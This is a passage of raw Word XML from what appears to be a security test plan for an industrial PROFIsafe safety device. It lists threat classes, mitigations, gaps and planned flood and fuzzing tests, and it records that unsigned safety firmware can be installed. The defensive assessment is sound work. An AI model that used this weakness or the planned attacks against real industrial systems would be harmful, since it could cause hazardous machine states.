        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A (Trusted Safety Function, E Safety Monitoring)</w:t>
      </w:r>
      <w:r w:rsidR="00634688" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, F (Domain Separation)</w:t>
      </w:r>
      <w:r w:rsidR="009D15C7" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>), H (Network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7714CF73" w14:textId="3D952539" w:rsidR="00DB1578" w:rsidRPr="006D5B99" w:rsidRDefault="00196EB6" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Denial of Service (primary); Tampering</w:t>
      </w:r>
      <w:r w:rsidR="005A4C32" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Spoofing, Elevation of Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A280199" w14:textId="77777777" w:rsidR="007062D6" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFFDBD6" w14:textId="50B98299"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 xml:space="preserve">External HW watchdog + F_WD_Time </w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> passivation (CR 3.6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA17530" w14:textId="6EAFCF98"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Black-channel principle</w:t>
      </w:r>
      <w:r w:rsidR="00223661" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> COM = QM; safety on SCPU.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3319811D" w14:textId="01384D0B"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Dual SCPU cross-check + STL</w:t>
      </w:r>
      <w:r w:rsidR="00223661" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Random-fault detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B04BB" w14:textId="7346E195" w:rsidR="00FE4904" w:rsidRPr="006D5B99" w:rsidRDefault="00FE4904" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PROFINET Net Load Class III (SRIO-1916), CC-C (SRIO-1915), IRT non-disturbance, port deactivation</w:t>
      </w:r>
      <w:r w:rsidR="00223661" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conformant-load robustness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112BC9F9" w14:textId="69D78AE2" w:rsidR="001A467C" w:rsidRPr="006D5B99" w:rsidRDefault="00FE4904" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2-connection HTTP cap (SRIO-7909).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053BF1F4" w14:textId="77777777" w:rsidR="00553BEB" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419FCEC" w14:textId="154492F3"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G-1</w:t>
      </w:r>
      <w:r w:rsidR="000F1E7E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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6D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> verify by fuzzing/flood.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408CEF7" w14:textId="4BB8377F" w:rsidR="008B1F58" w:rsidRPr="006D5B99" w:rsidRDefault="008B1F58" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r w:rsidR="000F1E7E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Even if every attack resolves safely to passivation, continuous forced passivation = continuous unavailability of the safety function </w:t>
      </w:r>
      <w:r w:rsidR="000F1E7E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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1C023581" w:rsidR="000835AC" w:rsidRPr="006D5B99" w:rsidRDefault="008B1F58" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r w:rsidR="00C94277" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Almost all foreseeable attacks resolve to the safe state (black channel + watchdog + CR 3.6) </w:t>
      </w:r>
      <w:r w:rsidR="00A274C5" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>except</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the unsigned-firmware install (RQ-005 G-2 / TC-RQ005-03), which installs attacker-controlled safety firmware </w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can lead to a hazardous situation. RQ-010 is met for the communication/DoS/fuzzing classes but NOT for the firmware-integrity class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064299C8" w14:textId="77777777" w:rsidR="000835AC" w:rsidRPr="006D5B99" w:rsidRDefault="000835AC" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DFEC378" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B70D307" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033B7F31" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E2A6D0" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BF5A96" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5C677D" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B45BFF2" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F678C3" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="134FAAE9" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB4B658" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C5070C" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CC3289" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E85F62" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605D4D76" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D55B9BB" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRPr="006D5B99" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D665A4E" w14:textId="4EEA1C0A" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="000835AC">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6D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="510FB4A7"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292505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22212C78"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DB3ABAB"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B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A93E451" w14:textId="24729C87" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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resilience: nominal PROFIsafe exchange under rated Net Load Class III conditions; confirm stable OPERATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26AAC521" w14:textId="3ED2F9B4" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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Functional baseline CR 7.1/7.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="223E8BFA" w14:textId="77777777" w:rsidR="006409CD"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094C1E33" w14:textId="401FE26F" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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PROFINET Net Load Class III</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00594454" w14:textId="77777777" w:rsidR="00AF4206" w:rsidRPr="006D5B99"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B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45DBB522" w14:textId="77777777" w:rsidR="00936B84"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PROFINET/L2 flood (escalating rate); observe safe-comms vs safe-passivation vs undefined; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD73149" w14:textId="2DFC5F2B" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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sustain to test repeated passivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42A42175" w14:textId="016FAADE" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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G-1/G-2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="178B51E4"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6D5B99"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MITRE T0814; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DDBF278" w14:textId="29F1D7B6" w:rsidR="0073544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§5.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD80D5F" w14:textId="5AE7134A" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99">
              <w:t>ifm CM-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A85DBF0" w14:textId="317A2EA9"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B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DC4918"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Protocol fuzzing :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01E85FBD" w14:textId="77777777" w:rsidR="003F4CAF"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 malformed PROFINET/DCP + PROFIsafe + HTTP; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E0B3A6C" w14:textId="65762EA5" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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crash/hang vs safe rejection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FCD232A" w14:textId="62066EB7" w:rsidR="00F345A8" w:rsidRPr="006D5B99"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CR 3.5/3.7; </w:t>
            </w:r>
            <w:r w:rsidR="008D0F54" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterizes</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> G-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C245EAB"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FSTM Stage 7; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6043C6FD" w14:textId="77777777" w:rsidR="008D0F54"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ifm CM-010 (boofuzz); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCAEB9C" w14:textId="5A5093D2" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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T0836</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02BD81FD" w14:textId="44135B6D"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B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41ABD09E" w14:textId="77777777" w:rsidR="00D01128"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IoT-Core application-layer flood</w:t>
            </w:r>
            <w:r w:rsidR="0035369B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">request flood; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="232E4A7F" w14:textId="6166D951" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirm COM-path attack does not reach the safety path (domain separation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41ECA614" w14:textId="4B3A97D6" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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Confirms Asset F resilience</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AA7BEAB" w14:textId="0D69358A" w:rsidR="00D01128"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ifm CM-009; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15738089" w14:textId="77777777" w:rsidR="00AE755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§4.3; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EAC3318" w14:textId="41026F45" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99">
              <w:t>MITRE T0814</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F30F3CA" w14:textId="312F54AC" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C02B3C8" w14:textId="37E17150" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99"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The EHSR success criterion; surfaces G-3 exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F50F007" w14:textId="36025181" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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threat-mitigation; PROFIsafe passivation theory</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C67E298" w14:textId="77777777" w:rsidR="00E60591" w:rsidRPr="006D5B99"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6D5B99"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263670" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00E60591" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1892A523" w14:textId="77777777" w:rsidR="0060054C" w:rsidRPr="006D5B99" w:rsidRDefault="0060054C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46680A3A" w14:textId="77777777" w:rsidR="0060054C" w:rsidRPr="006D5B99" w:rsidRDefault="0060054C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B11DD43" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A40C5DB" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E5BE37D" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
